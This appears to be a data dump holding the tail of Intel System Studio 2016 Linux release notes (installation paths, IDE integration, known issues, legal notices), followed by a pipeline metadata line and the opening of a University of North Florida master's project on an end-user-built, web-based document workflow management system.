target: N/A (graphic offload, debugger for heterogeneous computing)
o arch: Quark
target: Galileo (eglibc, uclibc)
Run gdbserver on the target platform to enable remote application debug.
During the Intel® System Studio product install you can also choose to install the gdbserver sources if support for additional target platforms is needed.
4. For the Intel® VTune Amplifier Sampling Enabling Product (SEP) pick ...
/system_studio_target/vtune_amplifier_2016_update2_for_systems_target/linux/vtune_amplifier_target_sep_x86[64].tgz
arch: 32, 64
5. For the Intel® VTune Amplifier for Systems target package pick ...
/system_studio_target/vtune_amplifier_2016_update2_for_systems_target/linux/vtune_amplifier_target_x86[64].tgz
arch: 32, 64
6. For WakeUp Watch for Android* follow the instructions at ...
/system_studio_target/wuwatch_android_v3.1.6b /WakeUpWatchForAndroid.pdf
7. For SoC Watch for Android* follow the instructions at ...
/system_studio_target/socwatch_android_vx.x.x/SoCWatchForAndroid_vx_x_x.pdf
8. For SoC Watch for Linux* follow the instructions at
9. For the Intel® Inspector for Systems follow the instructions in
../system_studio_target/inspector_2016_for_systems/
documentation/en/Release_Notes_Inspector_Linux.pdf
8.8.1 Intel® Inspector Command line interface installation
If you would like to install the Intel® Inspector command line interface only for thread checking
and memory checking on a development target device, please follow the steps outlined below:
1. From ../inspector_2016_for_systems/ on the target execute the environment
configuration script inspxe-genvars.sh.
2. Source the script inspxe-vars.sh generated by inspxe-genvars.sh.
3. The fully functional command-line Intel® Inspector installation can be found in the
bin32 and bin64 subdirectories for IA32 and Intel® 64 targets respectively.
8.8.2 Preparing a Target Android* System for Remote Analysis
If you would like to install the Intel® VTune™ Amplifier data collectors for power tuning and
performance tuning on an Android* target device, please follow the steps outlined below:
1. You will find SoC Watch at
../system_studio_target/socwatch_android_vx.x.x/
on the target.
o ../system_studio_target/socwatch_android_vx.x.x/
SocWatchForAndroid_vx_x_x.pdf
o The “Preparing a Target Android* System for Remote Analysis” chapter of the
Intel® VTune™ Amplifier User’s Guide.
2. You will find WakeUp Watch at
../system_studio_target/wuwat.ch_android_v3.1.6b/
on the target.
Please follow the instructions for installation and usage in
o ../system_studio_target/socwatch_android/
WakeUpWatchForAndroid.pdf
o The “Preparing a Target Android* System for Remote Analysis” chapter of the
Intel® VTune™ Amplifier User’s Guide.
8.8.3 Intel® VTune™ Amplifier Collectors Installation on Remote Linux* Systems
If you would like to install the Intel® VTune™ Amplifier data collector for power tuning and performance tuning on a development target device, please follow the steps outlined below:
1. You will find the Intel® VTune™ Amplifier data collectors at
```
../system_studio_target/vtune_amplifier_2016_update2_for_systems_target/linux/vtune_amplifier_target_x86[_64].tgz
arch: 32, 64
```
on the target.
2. Data collection on both IA32 and Intel® 64 targets is supported.
3. Follow the instructions in Help document in section “User’s guide->Running analysis remotely” for more details, on how to use this utility.
8.8.4 Intel® VTune™ Amplifier Sampling Enabling Product Installation on Remote Linux* Systems
If you would like to install the Intel® VTune™ Amplifier Sampling Enabling Product (SEP), please follow the steps outlined below:
1. You will find the Intel® VTune Amplifier Sampling Enabling Product at
```
../system_studio_target/vtune_amplifier_2016_update2_for_systems_target/linux<arch>/vtune_amplifier_target_sep_x86[_64].tgz
```
2. After unpacking this zip file follow the instructions in
```
../vtune_amplifier_2016_for_systems.2.x.xxxxxx/sepdk/src/README.txt
```
8.8.5 Intel® Integrated Performance Primitives redistributable shared object installation
If you are using dynamic linking when using the Intel® Integrated Performance Primitives, you will need to copy the relevant Linux* shared objects to the target device along with the application. The redistributable shared objects can be found at
```
<install-dir>/
system_studio_2016.2.xxx\compilers_and_libraries_2016\linux\ipp\lib
```
8.8.7 Intel® C++ Compiler dynamic runtime library installation
After unpacking system_studio_target.tgz on the target platform you will find the Intel® C++ Compiler runtime libraries at
`./system_studio_target/compilers_and_libraries_2016.2.xxx/linux/compiler/lib/<arch>,`
where `<arch>` is `ia32` or `intel64`.
8.9 Eclipse* IDE Integration
8.9.1 Installation
During System Studio installation you have the option to integrate product components into an existing Eclipse* installation, install Eclipse* (actually v4.5 Mars) that is included in the System Studio package or skip Eclipse integration at all.
If you decide to integrate System Studio tools into your existing Eclipse* installation (usually this could be `/opt/eclipse`) then make sure the prerequisites meet the following:
- Eclipse* IDE for C/C++ Developers, supported versions 3.8/4.2 (Juno) – Eclipse* 4.4 (Luna)
- Java Runtime Environment (JRE) version 6.0 (also called 1.6) update 11 or later.
Note: The Eclipse* integration of the GDB* GNU Project Debugger requires that the Intel® C++ Compiler installation is selected during Intel® System Studio installation as well.
8.9.2 Launching Eclipse for Development with the Intel C++ Compiler
Since Eclipse requires a JRE to execute, you must ensure that an appropriate JRE is available to Eclipse prior to its invocation. You can set the `PATH` environment variable to the full path of the folder of the `java` file from the JRE installed on your system or reference the full path of the java executable from the JRE installed on your system in the `--vm` parameter of the Eclipse command, e.g.:
```
eclipse --vm /JRE folder/bin/java
```
Invoke the Eclipse executable directly from the directory where it has been installed. For example:
```
<eclipse-install-dir>/eclipse/eclipse
```
8.9.3 Editing Compiler Cross-Build Environment Files
8.9.4 Cheat Sheets
The Intel® C++ Compiler Eclipse* Integration additionally provides Eclipse* style cheat sheets on how to set up a project for embedded use cases using the Intel® C++ Compiler
In the Eclipse* IDE see
Help > Cheat Sheets > Intel® C/C++ Compiler
8.9.5 Integrating the Intel® System Debugger into Eclipse*
Remote debugging with GDB using the Eclipse* IDE requires installation of the C/C++ Development Toolkit (CDT) (http://www.eclipse.org/downloads/packages/eclipse-ide-cc-developers/junosr2) as well as Remote System Explorer (RSE) plugins (http://download.eclipse.org/tm/downloads). In addition RSE has to be configured from within Eclipse* to establish connection with the target hardware.
To add Intel® System Debugger Eclipse* integration after full Intel® System Studio installation or to add the Intel® System Debugger launcher into Wind River* Workbench* this can be done from within Eclipse* by following these steps:
1. Navigate to the “Help > Install New Software “ entry in the pulldown menu
2. Select “Add” and “Local” in the following menus …
3. Browse to <ISS_INSTALL_PATH>/debugger/xdb/ide_plugins, where the default for ISS_INSTALL_PATH is /opt/intel/system_studio_2016.1.xxx /
8.10 Wind River* Workbench* IDE Integration
8.10.1 Documentation
1. You will find a detailed README file on the integration particulars of Intel® System Studio in the wr-iss-2016 subdirectory of the Wind River* Workbench* installation directory. This README also goes into the use of the Intel® C++ Compiler as a secondary toolchain layer and adding Intel® System Studio recipes to target platforms for both Wind River* Linux* and Yocto Project*.
2. Additionally there is a Wind River* Workbench integration feature and usage description in the “Using Intel® System Studio with Wind River* Linux* Build Environment” article.
8.10.2 Installation
It also integrated IDE launchers for Intel® VTune™ Amplifier for Systems and Intel® System Debugger.
This is offered automatically as a step in the Intel® System Studio product installation.
As part of the installation the following steps are taken implicitly:
1. Create folder wr-iss-2016 in both the Intel® System Studio installation directory and the Wind River® Workbench® installation directory.
2. In the wr-setup subdirectory, execute the script postinst_wr_iss.sh <install-dir>, providing the Intel® System Studio installation directory as a parameter. This script will register the platform recipes for different Intel® System Studio components and also the IDE integration of Intel® System components such as Intel® C++ Compiler, Intel® VTune™ Amplifier and Intel® System Debugger.
8.10.3 Manual installation
1. Change into the Wind River® Workbench® installation directory and there into the ..wr-iss-2016/wr-setup subdirectory.
2. In the wr-setup subdirectory, execute the script postinst_wr_iss.sh. This script will register the platform recipes for different Intel® System Studio components and also the IDE integration of Intel® System components such as Intel® C++ Compiler, Intel® VTune™ Amplifier and Intel® System Debugger.
8.10.4 Uninstall
3. Change into the Wind River® Workbench® installation directory and there into the ..wr-iss-2016/wr-setup subdirectory.
4. In the wr-setup subdirectory, execute the script uninst_wr_iss.sh
8.11 Installing Intel® XDP3 JTAG Probe
If the install.sh installation script is executed using root access, su or sudo rights, the required drivers will be installed automatically. Root, su or sudo rights are required for the installation.
8.12 Ordering JTAG Probe for the Intel® System Debugger
1. To order the Intel XDP3 JTAG probe, please go to: http://designintools.intel.com/product_p/itpxdp3brext.htm (ITP-XDP 3BRKit)
2. To order the closed-chassis adapter, please go to:
We will also gladly assist with the ordering process. If you have any questions please submit an issue in the Intel® System Studio product of Intel® Premier Support https://premier.intel.com or send an email to IntelSystemStudio@intel.com.
9 Issues and Limitations
9.1 General Issues and Limitations
For known issues of individual Intel® System Studio components please refer to the individual component release notes. Their location in the installed product can be found in chapter 2:
Technical Support and Documentation
9.1.1 Use non-RPM installation mode with Wind River* Linux* 5 and 6
RPM package access on Wind River* Linux* 5 may be slow and cause the Intel® System Studio installation to take a long time. On Wind River* Linux* 5 host it is recommended to invoke the installation script in non-RPM mode instead
$ ./install.sh --INSTALL_MODE NONRPM
or
$ ./install-GUI.sh --INSTALL_MODE NONRPM
9.1.2 Intel® Software Manager unsupported on Wind River* Linux* 5.0, Ubuntu* 12.04.
The Intel® Software Manager is not supported on Wind River* Linux* 5.0 and Ubuntu* 12.04.
9.1.3 Installation into non-default directory on Fedora* 19 may lead to failures
If Intel® System Studio is installed into a folder other than /opt/intel/system_studio_2016.1.xxx/ on Fedora 19, the installation of optional components and of the Python* source for GDB* may fail.
The workaround is to only install default components and deselect the Python* source component of GDB* during install.
Please refer to Bugzilla* report 1001553 entered against RPM tool 4.11 for details.
https://bugzilla.redhat.com/show_bug.cgi?id=1001553
9.1.4 Running online-installer behind proxy server fails
Running online-installer behind proxy server produces error: "Connection to the IRC site cannot be established". Please see the Installation Notes for more details
9.1.5 The online-installer has to be run with sudo or root access
If the online-installer is run as a regular user the installation will hang in step 6 of the installation. Please see the Installation Notes for more details.
9.1.6 Some hyperlinks in HTML documents may not work when you use Internet Explorer.
Try using another browser, such as Chrome or Firefox, or right-click the link, select Copy shortcut, and paste the link into a new Internet Explorer window.
9.2 Wind River* Linux* 7 Support
9.2.1 Windows* host is currently not supported for Wind River* Linux* 7 targeted development
Windows* host is currently not supported for Wind River* Linux* 7 targeted development
9.2.2 No integration into Wind River* Workbench* IDE is currently available for Wind River* Linux* 7 target
No integration into Wind River* Workbench* IDE is currently available for Wind River* Linux* 7 target
9.2.3 Remote event-based sampling with Intel® VTune™ Amplifier Limitations
When targeting Wind River* Linux* 7 with the Sampling Collector (SEP) for Intel® VTune™ Amplifier for Systems sampling with callstack using vtss.ko can lead to target freeze-up. The recommendation is to not use callstacks sampling when targeting Wind River* Linux* 7 until the next release update.
9.3 Intel® Energy Profiler
9.3.1 /boot/config-`uname –r` file must be present on platform.
In order to enable CPU power data collection for Intel® VTune™ Amplifier please make sure your environment does have a file named /boot/config-`uname –r` located in your /boot/config directory
If there is no such file you should run the following command:
$ cat /proc/config.gz | gunzip - > /boot/config-`uname –r`
9.3.2 Power and Frequency Analysis support for Intel® Atom™ Processor covers Android* OS only.
Power and frequency analysis currently requires at least a 2nd generation Intel® Core™ Processor Family based platform or an Intel® Atom™ Processor Z2xxx or Z3xxx running Android* OS
9.4 Intel® VTune™ Amplifier Usage with Yocto Project*
9.4.1 Building Sampling Collector (SEP) for Intel® VTune™ Amplifier driver on host Linux® system
For Yocto Project* targeted development additional kernel utilities required for building drivers and kernel modules need to be present in the kernel source tree. The following utilities need to be manually added to the standard Yocto Project* 1.x kernel build tree: viz, recordmcount, fixdep, and modpost.
9.4.2 Remote Intel® VTune™ Amplifier Sampling on Intel® 64 Yocto Project* Builds
The GNU linker ld is installed in a non-standard path on Yocto Project* 1.5 for Intel® 64 (x86_64). For remote sampling with amplxe-runss to work correctly "/lib64/ld-linux-x86-64.so.2 " has to be added as a symlink to /lib/ld-linux-x86-64.so.2 on the target filesystem.
9.4.3 Building 64bit Sampling Collector against Yocto Project* targeting Intel® Atom™ Processor E38xx requires additional build flags
Building the Intel® VTune™ Amplifier for Systems Sampling Collector driver SEPDK against the x86_64 version of Yocto Project 1.6 (Daisy) for Intel® Atom™ Processor E38xx requires a modification of the Makefile in ../sepdk/src and ../sepdk/pax.
In both cases the EXTRA_CFLAGS entry needs to be amended with the option
-DCONFIG_COMPAT:
EXTRA_CFLAGS += -I$(LDDINCDIR) -I$(LDDINCDIR1) -DCONFIG_COMPAT
9.5 Intel® System Studio System Analyzer
9.5.1 Supported Linux* Distributions
The Intel® System Studio System Analyzer is currently only supported on Ubuntu.
9.5.2 The path for the Intel® System Studio System Analyzer does not get set up automatically
To launch the Intel® System Studio System Analyzer it is necessary to change into the /opt/intel/usr/bin directory and run the scripts or add this directory to the PATH.
The run scripts for the System Analyzer binaries are located at:
- System Analyzer: /opt/intel/usr/bin/gpa-system-analyzer
- GPA console client: /opt/intel/usr/bin/gpa-console-client
- Platform Analyzer: /opt/intel/usr/bin/gpa-platform-analyzer
- Frame Analyzer for OpenGL: /opt/intel/FrameAnalyzerOGL/FrameAnalyzerOGL.sh
9.5.3 **Support for Intel® Atom™ Processor Z3560 and Z3580 code-named “Moorefield”** missing
Support for Intel® Atom™ Processor Z3560 and Z3580 code-named “Moorefield” is currently not available
### 9.6 Intel® System Debugger
9.6.1 **Intel® Puma™ 6 Media Gateway Firmware Recovery Tool not available**
The `start_xdb_firmware_recovery.sh / start_xdb_firmware_recovery.bat` utility to allow recovery of corrupted flash memory on the Intel® Puma 6 Media Gateway is not functional in the Intel® System Debugger 2016.
9.6.2 **Connecting to Intel® Quark™ SoC may trigger error message that can be ignored**
Establishing a connection with the Intel® System Debugger to an Intel® Quark™ SoC based platform using the ITP-XDP3 device will trigger a console message “MasterFrame.HostApplication Application Error”. The connection will be established but target is not stopped. To stop target execution press "Suspend Execution (Pause)".
9.6.3 **Using the symbol browser on large data sets and large symbol info files not recommended**
It is recommended to use the source files window to browse to the function to debug instead of the symbol browser as the use of the symbol browser on large data sets and large symbol information files (e.g. Android* kernel image) can lead to debugger stall.
9.6.4 **Limited support for Dwarf Version 4 symbol information**
If when debugging binaries generated with GNU* GCC 4.8 or newer the line information and variable resolution in the debugger is unsatisfactory, please try to rebuild your project using the `-gdwarf-3` option instead of simply `-g`.
### 9.7 GDB* - GNU* Project Debugger
9.7.1 **Eclipse* integration of GDB* requires Intel® C++ Compiler install**
The Eclipse* integration of the GDB* GNU Project Debugger requires that the Intel® C++ Compiler installation is selected during Intel® System Studio installation as well.
### 9.8 Intel® C++ Compiler
9.8.1 **“libgcc_s.so.1” should be installed on the target system**
By default the Intel® C++ Compiler links the compiled binary with the library “libgcc_s.so.1”. Some embedded device OSs, for example Yocto-1.7, don’t have it in default
10 Attributions
This product includes software developed at:
The Apache Software Foundation (http://www.apache.org/).
Portions of this software were originally based on the following:
- the W3C consortium (http://www.w3c.org).
- the SAX project (http://www.saxproject.org)
- voluntary contributions made by Paul Eng on behalf of the Apache Software Foundation that were originally developed at iClick, Inc., software copyright (c) 1999.
This product includes updcrc macro, Satchell Evaluations and Chuck Forsberg. Copyright (C) 1986 Stephen Satchell.
This product includes software developed by the MX4J project (http://mx4j.sourceforge.net).
This product includes ICU 1.8.1 and later. Copyright (c) 1995-2006 International Business Machines Corporation and others.
Portions copyright (c) 1997-2007 Cypress Semiconductor Corporation. All rights reserved.
This product includes XORP. Copyright (c) 2001-2004 International Computer Science Institute
This product includes software from the book "Linux Device Drivers" by Alessandro Rubini and Jonathan Corbet, published by O'Reilly & Associates.
This product includes hashtab.c. Bob Jenkins, 1996.
11 Disclaimer and Legal Information
No license (express or implied, by estoppel or otherwise) to any intellectual property rights is granted by this document.
Intel disclaims all express and implied warranties, including without limitation, the implied warranties of merchantability, fitness for a particular purpose, and non-infringement, as well as any warranty arising from course of performance, course of dealing, or usage in trade.
This document contains information on products, services and/or processes in development. All information provided here is subject to change without notice. Contact your Intel representative to obtain the latest forecast, schedule, specifications and roadmaps.
The products and services described may contain defects or errors known as errata which may cause deviations from published specifications. Current characterized errata are available on request.
Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Learn more at Intel.com, or from the OEM or retailer.
Copies of documents which have an order number and are referenced in this document may be obtained by calling 1-800-548-4725 or by visiting www.intel.com/design/literature.htm.
Intel, the Intel logo, Xeon, and Xeon Phi are trademarks of Intel Corporation in the U.S. and/or other countries.
Optimization Notice: Intel's compilers may or may not optimize to the same degree for non-Intel microprocessors for optimizations that are not unique to Intel microprocessors. These optimizations include SSE2, SSE3, and SSSE3 instruction sets and other optimizations. Intel does not guarantee the availability, functionality, or effectiveness of any optimization on microprocessors not manufactured by Intel. Microprocessor-dependent optimizations in this product are intended for use with Intel microprocessors. Certain optimizations not specific to Intel microarchitecture are reserved for Intel microprocessors. Please refer to the applicable product User and Reference Guides for more information regarding the specific instruction sets covered by this notice.
Notice Revision #20110804
*Other names and brands may be claimed as the property of others
© 2016 Intel Corporation.
|
{"Source-Url": "https://software.intel.com/sites/default/files/managed/3a/77/intel-system-studio-2016-update-2-linux-release-notes.pdf", "len_cl100k_base": 14952, "olmocr-version": "0.1.53", "pdf-total-pages": 37, "total-fallback-pages": 0, "total-input-tokens": 97672, "total-output-tokens": 17719, "length": "2e13", "weborganizer": {"__label__adult": 0.0005040168762207031, "__label__art_design": 0.0011186599731445312, "__label__crime_law": 0.000324249267578125, "__label__education_jobs": 0.0005059242248535156, "__label__entertainment": 0.00015735626220703125, "__label__fashion_beauty": 0.0002949237823486328, "__label__finance_business": 0.0010080337524414062, "__label__food_dining": 0.0002999305725097656, "__label__games": 0.00240325927734375, "__label__hardware": 0.024322509765625, "__label__health": 0.0002734661102294922, "__label__history": 0.0003383159637451172, "__label__home_hobbies": 0.0002613067626953125, "__label__industrial": 0.001506805419921875, "__label__literature": 0.00031447410583496094, "__label__politics": 0.00032067298889160156, "__label__religion": 0.0006985664367675781, "__label__science_tech": 0.0297393798828125, "__label__social_life": 5.1081180572509766e-05, "__label__software": 0.034027099609375, "__label__software_dev": 0.900390625, "__label__sports_fitness": 0.0003552436828613281, "__label__transportation": 0.0006322860717773438, "__label__travel": 0.00022351741790771484}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 67323, 0.04101]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 67323, 0.06661]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 67323, 0.73499]], "google_gemma-3-12b-it_contains_pii": [[0, 1528, false], [1528, 2962, null], [2962, 5911, null], [5911, 7480, null], [7480, 9742, null], [9742, 11648, null], [11648, 14277, null], [14277, 16394, null], [16394, 17663, null], [17663, 18942, null], [18942, 20716, null], [20716, 22787, null], [22787, 24869, null], [24869, 25086, null], [25086, 26903, null], [26903, 28813, null], [28813, 30961, null], [30961, 31908, null], [31908, 33940, null], [33940, 35774, null], [35774, 37589, null], [37589, 39684, null], [39684, 41534, null], [41534, 44233, null], [44233, 46164, null], [46164, 47869, null], [47869, 49598, null], [49598, 51591, null], [51591, 53430, null], [53430, 55571, null], [55571, 55956, null], [55956, 57783, null], [57783, 59513, null], [59513, 61614, null], [61614, 63758, null], [63758, 65053, null], [65053, 67323, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1528, true], [1528, 2962, null], [2962, 5911, null], [5911, 7480, null], [7480, 9742, null], [9742, 11648, null], [11648, 14277, null], [14277, 16394, null], [16394, 17663, null], [17663, 18942, null], [18942, 20716, null], [20716, 22787, null], [22787, 24869, null], [24869, 25086, null], [25086, 26903, null], [26903, 28813, null], [28813, 30961, null], [30961, 31908, null], [31908, 33940, null], [33940, 35774, null], [35774, 37589, null], [37589, 39684, null], [39684, 41534, null], [41534, 44233, null], [44233, 46164, null], [46164, 47869, null], [47869, 49598, null], [49598, 51591, null], [51591, 53430, null], [53430, 55571, null], [55571, 55956, null], [55956, 57783, null], [57783, 59513, null], [59513, 61614, null], [61614, 63758, null], [63758, 65053, null], [65053, 67323, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 67323, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 67323, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 67323, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 67323, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 67323, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 67323, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 67323, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 67323, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 67323, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 67323, null]], "pdf_page_numbers": [[0, 1528, 1], [1528, 2962, 2], [2962, 5911, 3], [5911, 7480, 4], [7480, 9742, 5], [9742, 11648, 6], [11648, 14277, 7], [14277, 16394, 8], [16394, 17663, 9], [17663, 18942, 10], [18942, 20716, 11], [20716, 22787, 12], [22787, 24869, 13], [24869, 25086, 14], [25086, 26903, 15], [26903, 28813, 16], [28813, 30961, 17], [30961, 31908, 18], [31908, 33940, 19], [33940, 35774, 20], [35774, 37589, 21], [37589, 39684, 22], [39684, 41534, 23], [41534, 44233, 24], [44233, 46164, 25], [46164, 47869, 26], [47869, 49598, 27], [49598, 51591, 28], [51591, 53430, 29], [53430, 55571, 30], [55571, 55956, 31], [55956, 57783, 32], [57783, 59513, 33], [59513, 61614, 34], [61614, 63758, 35], [63758, 65053, 36], [65053, 67323, 37]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 67323, 0.03333]]}
|
olmocr_science_pdfs
|
2024-12-10
|
2024-12-10
|
b2f52e0226ce8201baf40ffae7234236d75994af
|
2005
An End-User Development Approach to Building Customizable Web-Based Document Workflow Management Systems
Stacy Hutchings
Suggested Citation
AN END-USER DEVELOPMENT APPROACH TO BUILDING CUSTOMIZABLE WEB-BASED DOCUMENT WORKFLOW MANAGEMENT SYSTEMS
by
Stacy Hutchings
A project submitted to the Department of Computer and Information Sciences in partial fulfillment of the requirements for the degree of Master of Science in Computer and Information Sciences
UNIVERSITY OF NORTH FLORIDA
DEPARTMENT OF COMPUTER AND INFORMATION SCIENCES
December, 2005
The project "An End-User Development Approach to Building Customizable Web-Based Document Workflow Management Systems" submitted by Stacy Hutchings in partial fulfillment of the requirements for the degree of Master of Science in Computer and Information Sciences has been approved by the project committee:
Signature Deleted
Arturo Sánchez-Ruiz, Ph.D.
Project Director
Signature Deleted
Judith L. Solano, Ph.D.
Chairperson of the Department
Signature Deleted
Charles N. Winton, Ph.D.
Graduate Director
Date 12/16/05
ACKNOWLEDGEMENT
I would like to thank Dr. Arturo Sánchez-Ruíz for his time and feedback during the implementation of this project. His encouragement and his belief in my work ethic and commitment helped me achieve this important milestone.
I also wish to thank my family and extended family, especially my husband "Hutch," my son Jimi, and my daughter Caitlyn, for their unwavering love and encouragement over the past four years. Without their support, this accomplishment would not have been possible. For the many sacrifices they have made, I am forever grateful.
CONTENTS
List of Figures .......................................... vi
Abstract ................................................. ix
Chapter 1: Introduction .................................. 1
1.1 The Workflow Reference Model ....................... 2
1.2 Related Work ....................................... 5
1.3 System Overview: Our Approach ...................... 6
Chapter 2: System Architecture ........................... 9
2.1 Technologies Used .................................. 9
2.2 Architecture ...................................... 11
Chapter 3: Implementation ............................... 16
3.1 Security and Encryption ........................... 18
3.2 User Management ................................... 19
3.3 System Management ................................. 20
3.4 Definition Modes and Versions ..................... 21
3.5 Form Management .................................. 23
3.6 Workflow Management ................................ 24
3.6.1 States ......................................... 24
3.6.2 Transitions .................................... 25
3.6.2.1 Assignment Strategies ....................... 26
3.6.2.2 Transition Strategies ....................... 27
3.7 Definition Management ............................. 29
3.7.1 Transition Rules ........................................ 30
3.7.2 Form Rules ........................................... 30
3.7.3 Rule Definition ..................................... 31
3.7.3.1 The Required Validator ......................... 31
3.7.3.2 The Compare Validator ........................ 31
3.7.3.3 The Range Validator ............................ 32
3.8 Task Management ....................................... 32
Chapter 4: Conclusions ..................................... 34
4.1 Summary ............................................. 34
4.2 Future Enhancement Recommendations .............. 35
References ................................................... 37
Appendix A: Database Logical Model ....................... 40
Appendix B: System Demonstration ........................ 41
Vita .......................................................... 91
FIGURES
Figure 1: The Workflow Reference Model .................... 3
Figure 2: Architecture Overview .......................... 12
Figure 3: System Implementation .......................... 17
Figure A1: Database Logical Model ......................... 40
Figure B1: The Log In Screen ............................. 41
Figure B2: Register Account Screen ........................ 42
Figure B3: The Standard User View ......................... 43
Figure B4: The Workflow Engineer View ..................... 43
Figure B5: The Administrator View ......................... 43
Figure B6: The Manage User - User Tab ..................... 44
Figure B7: The Manage User - User Groups Tab ............. 45
Figure B8: The Manage Groups - Group Tab ................ 46
Figure B9: The Manage Groups - Account Members Tab ...... 47
Figure B10: The Manage Groups - Group Members Tab ..... 47
Figure B11: The Manage Systems - System Tab ............. 48
Figure B12: The Manage Systems - System Processes Tab ... 49
Figure B13: The Manage Form Lists - Category Tab ....... 50
Figure B14: The Manage Form Lists - Item Tab ............. 51
Figure B15: The Design Form - Form Tab .................. 52
Figure B16: The Design Form - Pages Tab .................. 53
Figure B17: The Design Form - Sections Tab ............... 54
Figure B43: The Manage Systems - System Processes Tab .... 73
Figure B44: The Home Page - Select A System Menu .......... 73
Figure B45: The UNF System - Home Page ................... 74
Figure B46: The UNF System - View Workflow Queue .......... 75
Figure B47: The UNF System - View Workflow Queue .......... 76
Figure B48: The UNF System - Add New Instance .............. 77
Figure B49: The UNF System - J Hutchings’ Pending Queue .. 78
Figure B50: View Instance Details - Summary Tab .......... 79
Figure B51: View Instance Details - Comments Tab .......... 80
Figure B52: View Instance Details - Transition Tab .......... 81
Figure B53: View Instance Details - Reassign Tab .......... 81
Figure B54: Pending Tasks for Stacy Hutchings ............. 82
Figure B55: View Instance Details - Comments Tab .......... 83
Figure B56: View Instance Details - Transition Tab .......... 83
Figure B57: View Workflow Queue - Closed ................. 84
Figure B58: View Instance Details - Comments Tab .......... 84
Figure B59: View Instance Details - Validation Error ...... 85
Figure B60: View Instance Details - View Only Mode ........ 86
Figure B61: Pending Tasks for Stacy Hutchings ............. 87
Figure B62: The UNF System - View Instance Details ....... 87
Figure B63: Transition Tab: Select Participant .............. 88
Figure B64: Pending Tasks for Caitlyn Hutchings .......... 89
Figure B65: View Instance Details - Transition Tab ........ 89
Figure B66: The UNF System - View Workflow Queue Closed .. 90
ABSTRACT
As organizations seek to control their practices through Business Process Management (BPM — or the process of improving the efficiency and effectiveness of an organization through the automation of tasks), workflow management systems (WFMS) have emerged as fundamental supporting software tools. A WFMS must maintain process state while managing the utilization of people and applications (resources), data (context), and constraints (rules) associated with each of the tasks [Baeyens04]. It must also be configurable so it can be easily adapted to manage specific workflows within any application domain. Finally, the WFMS should be flexible enough to allow for changing business needs. In order to meet these challenges, a WFMS must provide access to process and document definition tools as well as administrative tools.
In this project we have used an “End User Development” (EUD) approach [Repenning04] to build a stand-alone web-based WFMS which offers the non-technical end user the ability to design, launch, and manage multiple automated
workflows and their associated documents. It empowers end users to build and customize their own systems without requiring from them skills other than those associated with their domain of expertise.
Chapter 1
INTRODUCTION
The benefits of automating workflow are often the selling points of a WFMS system. Documented on many commercial WFMS websites are the following: it can reduce the amount of paper, it can reduce the amount of administrative work, it can reduce errors, it can reduce cost, it can reduce time, and through process monitoring tools, it can prove its own efficiency. Numerous case studies support the finding that businesses gain many improvements through the use of automated workflows. This section begins with a discussion of the Workflow Reference Model, which delineates the essential components of a WFMS. A section that reviews related work follows, which reveals how our approach differs from others that have been documented in the current literature. Finally, the last section gives an overview of the system we built, highlighting its contributions.
1.1 The Workflow Reference Model
The Workflow Management Coalition (WfMC) was established in 1993 to address the "computerized facilitation or automation of a business process, in whole or in part" [WfMC]. A business process, manual or automated, can be defined as a series of tasks that are performed by a person, persons, or applications in order to achieve an overall goal. Rules accompany the process by governing such things as the order the tasks are performed, as well as the amount and type of information presented and exchanged at each step. Each task should be defined in enough detail to determine the who, the what, the when, and the how of the process detail. It is important to know at each step, who is responsible for the task, what information needs to be collected, and when the task should occur. In addition, privileges and constraints control how it should occur (this includes determining the next step(s) as defined by the network of tasks).
In 1995, continuing their efforts to provide common ground in the field of workflow, the WfMC published the Workflow Reference Model [WFMC-TC-1003] depicted in Figure 1 to illustrate the major components and interfaces of a generic WFMS architecture. The model suggests five interfaces, or functionalities, a WFMS should support:
- **Interface 1** is the process definition interface: to define, modify, or import a process definition that will be interpreted by the workflow enactment service.
• Interface 2 is the workflow client interface: to present pending tasks to workflow participants for viewing or processing purposes.
• Interface 3 is the invoked application interface: to interact with other applications, such as the ability to invoke a messaging service to notify participants of their tasks.
• Interface 4 is the workflow enactment service interface: to interact with other workflow systems.
• Interface 5 is the administration tool and monitoring interface: to support process monitoring and management utilities for operating the entire WFMS system.
The five interfaces surround the core of the WFMS, a workflow enactment service comprised of one or more workflow engines. The responsibility of the workflow enactment service is to coordinate actions among the workflow engines that interpret the process definition and activate external resources.
1.2 Related Work
There are many commercial WFMS products available and the list of open source products is growing [e.g., Perez, Topicus, Baeyens04]. Very few claim to be complete WFMS, but rather workflow engines. In the review of seven open source Java-based workflow products [EnhydraShark, jBPM, JFolder, OpenWFE, wfmOpen, XFlow, YAWL], not one offered the end user a complete WFMS solution, implemented with the recommended interfaces of the Workflow Reference Model and without the need for technical knowledge or systems development skills. Instead, most adopted a minimalist view of the scope of a WFMS by providing a framework that leaves much of the implementation details to the users of the system. It is worth mentioning that there are two levels of "users" of WFMS, namely developers, who must customize WFMS frameworks to generate actual workflow applications, and end users, who will use the system as part of a BPM approach within an organization. The motivation and focus of this project has been on the needs of the latter, by empowering them with the ability to build their own workflow systems without the intervention of developers (the former).
1.3 System Overview: Our Approach
